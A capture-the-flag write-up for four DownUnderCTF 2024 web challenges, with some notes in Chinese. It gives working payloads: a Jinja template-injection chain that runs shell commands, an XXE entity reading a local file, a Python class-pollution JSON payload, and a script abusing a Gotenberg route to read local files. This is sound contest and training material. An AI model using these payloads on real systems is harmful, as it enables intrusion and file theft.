DownUnderCTF 2024 web

parrot the emu

jinja ssti

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag').read()") }}
{% endif %}
{% endfor %}

zoo feedback form

xxe

<?xml version="1.0" encoding="UTF-8"?>
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY flag SYSTEM "file:///app/flag.txt"> ]>
<root>
    <feedback>&flag;</feedback>
</root>

co2

python原型链污染
参考https://www.cnblogs.com/Article-kelp/p/17068716.html
审计源码
在routes.py

@app.route("/save_feedback", methods=["POST"])
@login_required
def save_feedback():
    data = json.loads(request.data)
    feedback = Feedback()
    # Because we want to dynamically grab the data and save it attributes we can merge it and it *should* create those attribs for the object.
    merge(data, feedback)
    save_feedback_to_disk(feedback)
    return jsonify({"success": "true"}), 200

@app.route("/get_flag")
@login_required
def get_flag():
    if flag == "true":
        return "DUCTF{NOT_THE_REAL_FLAG}"
    else:
        return "Nope"

@app.route("/api/update_user_data")
@login_required
def update_user_data():
    return "Coming Soon..."

flag == true 得到flag
看/save_feedback路由的merge方法

可以通过merge来将flag的属性污染为true

{"__class__":{"__init__":{"__globals__":{"flag":"true"}}}}

hah got em

看附件的dockerfile
gotenberg/gotenberg:8.0.3
找历史版本https://github.com/gotenberg/gotenberg/releases

https://gotenberg.dev/docs/routes#convert-with-chromium
找到路由/forms/chromium/convert/url

import requests

URL = "https://web-hah-got-em-20ac16c4b909.2024.ductf.dev/"

r = requests.post(URL + "forms/chromium/convert/url", 
          files={
            'url': (None, 'file://localhost/etc/flag.txt'),
          })

f = open("res.pdf", "wb")
f.write(r.content)